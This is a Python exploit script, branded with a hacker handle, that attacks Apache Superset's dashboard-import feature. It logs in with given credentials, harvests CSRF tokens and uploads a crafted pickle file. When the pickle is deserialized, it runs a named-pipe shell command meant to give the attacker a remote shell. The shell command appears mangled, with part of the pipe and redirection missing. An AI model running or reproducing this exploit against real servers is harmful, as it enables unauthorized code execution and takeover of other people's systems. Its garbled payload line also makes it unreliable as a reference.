'''_____________________________________________________________________ |[] SHELL |ROOT]|!"| |"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"| |CODED BY > R3DXPLOIT(JIMMY) | | |EMAIL > RETURN_ROOT@PROTONMAIL.COM | | |Original PoC by David May (david.may@semanticbits.com) | | |_____________________________________________________________________|/| ''' import sys import os from lxml import html import requests import argparse headers_dict = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0', 'DNT': '1', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', } def main() : parser = argparse.ArgumentParser() parser.add_argument('-t', '--tcp', help='tcp ip for shell', dest='tcp' , required = True ) parser.add_argument('-tp', '--tport', help='tcp port for shell', dest='tport', required = True) parser.add_argument('-i', '--ip', help='ip', dest='ip', required = True) parser.add_argument('-p', '--port', help='port', dest='port', required = True) parser.add_argument('-U', '--user', help='User must belong to user with can Import Dashboards on Superset privilege', dest='user', required = True) parser.add_argument('-P', '--passw', help='pass must belong to user with can Import Dashboards on Superset privilege', dest='passw', required = True) args = parser.parse_args() # Script arguments args.port = args.port # Verify these URLs match your environment login_URL = 'http://' + args.tcp + ':' + args.tport + '/login/' upload_URL = 'http://' + args.tcp + ':' + args.tport + '/superset/import_dashboards' if os.path.isfile(str(args.ip)+'_'+str(args.port)+'.pickle'): os.remove(str(args.ip)+'_'+str(args.port)+'.pickle') headers_dict = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0', 'DNT': '1', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', } evilPickle = open(str(args.ip)+'_'+str(args.port)+'.pickle','w+') evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0/tmp/backpipe\'\ntR.') evilPickle.close() try : session = requests.session() login_page = session.get(login_URL) if login_page.status_code != 200: print('Login page not reached') login_tree = html.fromstring(login_page.content) token = login_tree.xpath('//input[@id="csrf_token"]/@value') login_data = { 'token' : token, 'username' : args.user, 'password' : args.passw, } headers_dict['Referer'] = login_URL login = session.post(login_URL, headers=headers_dict, data=login_data) upload_page = session.get(upload_URL) if upload_page.status_code != 200: print('Upload page not reached') upload_tree = html.fromstring(upload_page.content) token = upload_tree.xpath('//input[@id="csrf_token"]/@value') headers_dict['Referer'] = upload_URL upload = session.post(upload_URL, headers=headers_dict, data={'token':token}, files={'file':(str(args.ip)+'_'+str(args.port)+'.pickle',open(str(args.ip)+'_'+str(args.port)+'.pickle','rb'),'application/octet-stream')}) session.close() sys.exit() except requests.exceptions.ConnectionError : print('Connection Refused, Check The IP and PORT!!!') except Exception as e: print('Error :\n\n' , e) if __name__ == "__main__" : main()